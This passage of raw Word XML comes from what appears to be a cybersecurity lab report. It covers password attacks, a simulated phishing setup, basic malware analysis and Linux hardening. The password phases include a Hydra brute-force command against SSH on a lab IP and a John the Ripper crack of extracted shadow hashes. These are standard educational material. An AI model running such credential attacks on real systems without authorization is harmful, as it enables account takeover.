          <w:color w:val="282828"/>
        </w:rPr>
        <w:t>Executing automated authentication tests against the SSH service using Hydra [cite: 15]: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B5848" w14:paraId="3B58B6DF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24" w:space="0" w:color="2563EB"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F4F8"/>
          </w:tcPr>
          <w:p w14:paraId="1DD62511" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="100" w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.101</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="556C5D9B" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="002B5848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2B5848" w14:paraId="484E27B1" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa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  <w:shd w:val="clear" w:color="auto" w:fill="FEF3C7"/>
          </w:tcPr>
          <w:p w14:paraId="394FDFEC" w14:textId="60CF4E8C" w:rsidR="002B5848" w:rsidRDefault="00B50DF1">
            <w:pPr>
              <w:spacing w:before="160" w:after="16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C0548D3" wp14:editId="652C622B">
                  <wp:extent cx="5943600" cy="3534410"/>
                  <wp:effectExtent l="0" t="0" r="0" b="8890"/>
                  <wp:docPr id="1645870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58706" name="Picture 1645870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34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558BA9" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="002B5848">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61DBD4D8" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="284678"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>4.2 Phase 3.2: Offline Hash Cracking (John the Ripper)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49814573" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="282828"/>
        </w:rPr>
        <w:t>Auditing extracted shadow password hashes offline using John the Ripper [cite: 15]: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B5848" w14:paraId="0D52B091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24" w:space="0" w:color="2563EB"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F4F8"/>
          </w:tcPr>
          <w:p w14:paraId="7F522497" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="100" w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>john --wordlist=/usr/share/wordlists/rockyou.txt cracked_hashes.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="384C59F5" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="002B5848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2B5848" w14:paraId="4DFF1A9E" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa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  <w:shd w:val="clear" w:color="auto" w:fill="FEF3C7"/>
          </w:tcPr>
          <w:p w14:paraId="6423D715" w14:textId="1C8402D6" w:rsidR="002B5848" w:rsidRDefault="00B50DF1">
            <w:pPr>
              <w:spacing w:before="160" w:after="16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F6D9447" wp14:editId="507AD9D8">
                  <wp:extent cx="5943600" cy="3478530"/>
                  <wp:effectExtent l="0" t="0" r="0" b="7620"/>
                  <wp:docPr id="1720953073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0953073" name="Picture 1720953073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478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ACFF02" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="002B5848">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DBFC0DF" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="320" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0F2043"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>5. Step 4: Social Engineering (Simulation Only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2057205A" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="282828"/>
        </w:rPr>
        <w:t>Step 4 covers social engineering awareness through controlled phishing simulations [cite: 15].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4980E168" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="284678"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>5.1 Phase 4.1: Phishing Portal Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70541BE9" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="282828"/>
        </w:rPr>
        <w:t>Setting up a simulated landing page template to evaluate phishing susceptibility [cite: 15].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2B5848" w14:paraId="0327BB2D" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa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  <w:shd w:val="clear" w:color="auto" w:fill="FEF3C7"/>
          </w:tcPr>
          <w:p w14:paraId="65BF9E45" w14:textId="55BF2314" w:rsidR="002B5848" w:rsidRDefault="00684468">
            <w:pPr>
              <w:spacing w:before="160" w:after="16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0B19354" wp14:editId="4A4C9CD9">
                  <wp:extent cx="5943600" cy="3525520"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="80090540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0905401" name="Picture 800905401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25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44555C" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="002B5848">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="268B841E" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="284678"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>5.2 Phase 4.2: Security Awareness Training Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51582746" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="282828"/>
        </w:rPr>
        <w:t>Establishing employee awareness protocols and reporting workflows to mitigate phishing risks [cite: 15].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2B5848" w14:paraId="754C84EF" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa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  <w:shd w:val="clear" w:color="auto" w:fill="FEF3C7"/>
          </w:tcPr>
          <w:p w14:paraId="3DE780FF" w14:textId="1FE11500" w:rsidR="002B5848" w:rsidRDefault="00684468">
            <w:pPr>
              <w:spacing w:before="160" w:after="16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8EF62B7" wp14:editId="180AB883">
                  <wp:extent cx="5943600" cy="3912870"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="2065709437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5709437" name="Picture 2065709437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12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94BDE9" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="002B5848">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C465B80" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="320" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0F2043"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>6. Step 5: Malware Basics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42311EC2" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="282828"/>
        </w:rPr>
        <w:t>Step 5 evaluates binary properties using static inspection and dynamic runtime tracing [cite: 16].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7175C979" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="284678"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>6.1 Phase 5.1: Static Malware Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBF0E5C" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="282828"/>
        </w:rPr>
        <w:t>Evaluating file architecture, computing hashes, and extracting printable strings without executing the binary [cite: 16]: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B5848" w14:paraId="395FA742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24" w:space="0" w:color="2563EB"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F4F8"/>
          </w:tcPr>
          <w:p w14:paraId="1296AC60" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="100" w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>file ./benign_sample</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>md5sum ./benign_sample</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>strings ./benign_sample | head -n 20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="25A0544A" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="002B5848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2B5848" w14:paraId="0FBACFEF" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa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  <w:shd w:val="clear" w:color="auto" w:fill="FEF3C7"/>
          </w:tcPr>
          <w:p w14:paraId="12CE4F09" w14:textId="40AA4181" w:rsidR="002B5848" w:rsidRDefault="00684468">
            <w:pPr>
              <w:spacing w:before="160" w:after="16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E9FBAD8" wp14:editId="75BA587E">
                  <wp:extent cx="5943600" cy="2495550"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="121779994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779994" name="Picture 121779994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95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C7B821" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="002B5848">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64EF7538" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="284678"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>6.2 Phase 5.2: Dynamic Behavioral Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5170DE21" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="282828"/>
        </w:rPr>
        <w:t>Tracing kernel system calls (`strace`) during runtime execution in a sandbox environment [cite: 16]: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B5848" w14:paraId="7B2A309E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24" w:space="0" w:color="2563EB"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F4F8"/>
          </w:tcPr>
          <w:p w14:paraId="72066A55" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="100" w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>strace -e trace=open,openat,execve ./benign_sample</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1C98136A" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="002B5848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2B5848" w14:paraId="199F1B88" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa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  <w:shd w:val="clear" w:color="auto" w:fill="FEF3C7"/>
          </w:tcPr>
          <w:p w14:paraId="112D8049" w14:textId="563D09D0" w:rsidR="002B5848" w:rsidRDefault="00684468">
            <w:pPr>
              <w:spacing w:before="160" w:after="160"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EAE4740" wp14:editId="3E8E0829">
                  <wp:extent cx="5943600" cy="2108200"/>
                  <wp:effectExtent l="0" t="0" r="0" b="6350"/>
                  <wp:docPr id="786583157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6583157" name="Picture 786583157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0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EFEDED" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="002B5848">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A875572" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="320" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0F2043"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>7. Step 6: System Hardening</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E5C0AB" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="282828"/>
        </w:rPr>
        <w:t>Step 6 applies host-level security controls to close potential attack vectors [cite: 16].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1D3A30" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="284678"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>7.1 Phase 6.1: Security Patch Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354E03A7" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="282828"/>
        </w:rPr>
        <w:t>Synchronizing package repositories and applying system package updates [cite: 16]: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B5848" w14:paraId="44AE7E03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24" w:space="0" w:color="2563EB"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F4F8"/>
          </w:tcPr>
          <w:p w14:paraId="0CEEEAB3" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="100" w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>sudo apt update &amp;&amp; sudo apt upgrade -y</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="752520A3" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="002B5848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2B5848" w14:paraId="48D1D1CF" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa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  <w:shd w:val="clear" w:color="auto" w:fill="FEF3C7"/>
          </w:tcPr>
          <w:p w14:paraId="2C620E78" w14:textId="326D5281" w:rsidR="002B5848" w:rsidRDefault="00684468">
            <w:pPr>
              <w:spacing w:before="160" w:after="160"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2702DE8E" wp14:editId="730C29DE">
                  <wp:extent cx="5943600" cy="3115945"/>
                  <wp:effectExtent l="0" t="0" r="0" b="8255"/>
                  <wp:docPr id="1934439359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4439359" name="Picture 1934439359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15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6ABF3A" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="002B5848">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E36E36A" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="284678"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>7.2 Phase 6.2: Host Firewall Configuration (UFW)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABF676D" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="282828"/>
        </w:rPr>
        <w:t>Enforcing default-deny inbound firewall policies while permitting SSH management traffic [cite: 16]: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B5848" w14:paraId="6C72CC81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24" w:space="0" w:color="2563EB"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F4F8"/>
          </w:tcPr>
          <w:p w14:paraId="3BEF7546" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="100" w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>sudo ufw default deny incoming</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>sudo ufw allow 22/tcp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>sudo ufw enable</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>sudo ufw status verbose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0B1C550C" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="002B5848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2B5848" w14:paraId="24760CFC" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa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  <w:shd w:val="clear" w:color="auto" w:fill="FEF3C7"/>
          </w:tcPr>
          <w:p w14:paraId="58F75B4A" w14:textId="5740ACF5" w:rsidR="002B5848" w:rsidRDefault="00684468">
            <w:pPr>
              <w:spacing w:before="160" w:after="16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7380832" wp14:editId="1E506A09">
                  <wp:extent cx="5943600" cy="2284730"/>
                  <wp:effectExtent l="0" t="0" r="0" b="1270"/>
                  <wp:docPr id="1517581603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7581603" name="Picture 151758160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84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DCF6FD" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="002B5848">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AFC20C7" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="284678"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>7.3 Phase 6.3: Network Service &amp; Socket Audit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7582361A" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="282828"/>
        </w:rPr>
        <w:t>Auditing listening network sockets (`ss -tulpn`) and disabling unapproved daemons [cite: 16]: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B5848" w14:paraId="1DD7D1B7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24" w:space="0" w:color="2563EB"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F4F8"/>
          </w:tcPr>
          <w:p w14:paraId="1F626C0C" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="100" w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>sudo ss -tulpn</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7B952CA6" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="002B5848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2B5848" w14:paraId="12909211" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa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  <w:shd w:val="clear" w:color="auto" w:fill="FEF3C7"/>
          </w:tcPr>
          <w:p w14:paraId="24DECDF9" w14:textId="51901F17" w:rsidR="002B5848" w:rsidRDefault="00684468">
            <w:pPr>
              <w:spacing w:before="160" w:after="160"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="210594BE" wp14:editId="6C3C75B1">
                  <wp:extent cx="5943600" cy="1633855"/>
                  <wp:effectExtent l="0" t="0" r="0" b="4445"/>
                  <wp:docPr id="387287527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7287527" name="Picture 387287527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633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404A07" w14:textId="77777777" w:rsidR="002B5848" w:rsidRDefault="002B5848">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="002B584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9887877">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="379474824">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1274559390">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1095444988">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="23754545">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1967615988">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="233198531">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="2010864806">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="2099055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5848"/>
    <w:rsid w:val="00326F90"/>
    <w:rsid w:val="00684468"/>
    <w:rsid w:val="00AA1D8D"/>
    <w:rsid w:val="00B47730"/>
    <w:rsid w:val="00B50DF1"/>
    <w:rsid w:val="00CB0664"/>
    <w:rsid w:val="00CD31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B54ABB"/>
  <w14:defaultImageDpi w14:val="300"/>
  <w15:docId w15:val="{E8D348D6-B1B6-4D29-B4BC-12D05A799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14</Pages>
  <Words>779</Words>
  <Characters>4445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charan jetty</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-12-23T23:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-14T06:37:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>